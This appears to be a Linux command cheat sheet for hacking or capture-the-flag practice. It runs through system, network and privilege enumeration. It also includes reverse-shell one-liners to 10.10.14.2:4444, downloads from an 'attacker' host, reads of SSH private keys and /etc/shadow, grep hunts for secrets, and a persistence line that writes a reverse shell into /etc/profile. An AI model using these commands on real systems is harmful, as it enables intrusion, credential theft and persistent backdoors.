Linux Commands 4 Hackers

whoami               # current user
id                   # UID, GID, groups
hostname             # machine name
uname -a             # kernel info
cat /etc/*release    # distro info
uptime               # system uptime

lscpu                # CPU info
lsblk                # block devices
df -hT               # disks + types
free -h              # memory
lspci / lsusb        # hardware enumeration
dmidecode            # BIOS, manufacturer info

ip a                 # interfaces & IPs
ip r                 # routing table
netstat -tulnp       # open ports (deprecated)
ss -tulnp            # preferred socket view
arp -a               # ARP cache
ifconfig / iwconfig  # interface info (legacy)
route -n             # routing table

cat /etc/passwd | cut -d: -f1
grep -i "sudo" /etc/group
getent passwd root

sudo -l
sudo -ll | grep "NOPASSWD"

cat /etc/crontab
ls -la /etc/cron.*
systemctl list-timers

find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null

find / -writable -type d 2>/dev/null

find / -name "flag*" 2>/dev/null
find /home -iname "*.txt"

grep -i -r "password" /etc 2>/dev/null
grep -i "pass\|secret\|token" -r /home 2>/dev/null

cat ~/.bash_history
cat ~/.ssh/id_rsa
cat ~/.ssh/known_hosts
ls -la /etc/ssh/
cat /var/log/auth.log | tail -n 20

cp, mv, rm, touch, mkdir, rmdir, ln -s

cat, less, head, tail, sort, uniq, cut, awk, sed

wc -l file.txt
grep "pattern" file.txt
grep -r "pattern" /etc/
awk -F: '{print $1,$3,$6}' /etc/passwd

ping -c 4 target
traceroute target
curl -I https://target
wget https://target/file

ssh user@host
scp file user@host:/path/
rsync -avz /dir/ user@host:/dest/

ssh -L 8080:127.0.0.1:80 user@target

bash -i >& /dev/tcp/10.10.14.2/4444 0>&1
nc -e /bin/sh 10.10.14.2 4444
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.2",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

uname -r
searchsploit linux kernel 4.4

getcap -r / 2>/dev/null

cat /etc/shadow
sudo cat /etc/shadow

find / -type f -perm /6000 2>/dev/null
find / -type f -name "*.sh" -writable

ps aux
top / htop
pgrep -a apache

systemctl list-units --type service
service --status-all

jobs
fg %1
bg %1

tar -czf archive.tar.gz /dir/
tar -xzf archive.tar.gz
zip -r files.zip /folder/
unzip files.zip
scp files.zip user@host:/tmp
wget http://attacker/file.sh -O /tmp/file.sh
curl -o /tmp/file.sh http://attacker/file.sh
base64 file > file.b64
base64 -d file.b64 > file

alias ll='ls -la'
history | grep ssh
export PATH=/usr/local/bin:/usr/bin:/bin
strings binary | grep flag
file /bin/ls
ldd /bin/bash

strace -f ./binary
ltrace ./program
gdb -q ./binary
readelf -a binary
objdump -d binary | less

echo "@reboot /home/user/script.sh" | crontab -
echo "bash -i >& /dev/tcp/10.10.14.2/4444 0>&1" > /etc/profile

whoami && id
sudo -l
ls -la /home
find / -perm -4000 2>/dev/null
cat /etc/crontab

find / -type f -iname "*flag*" 2>/dev/null
grep -r "flag{" /home /opt 2>/dev/null

echo "[+] USER:" $(whoami)
echo "[+] HOST:" $(hostname)
echo "[+] KERNEL:" $(uname -r)
sudo -l 2>/dev/null
find / -perm -4000 -type f 2>/dev/null | tee /tmp/suid.txt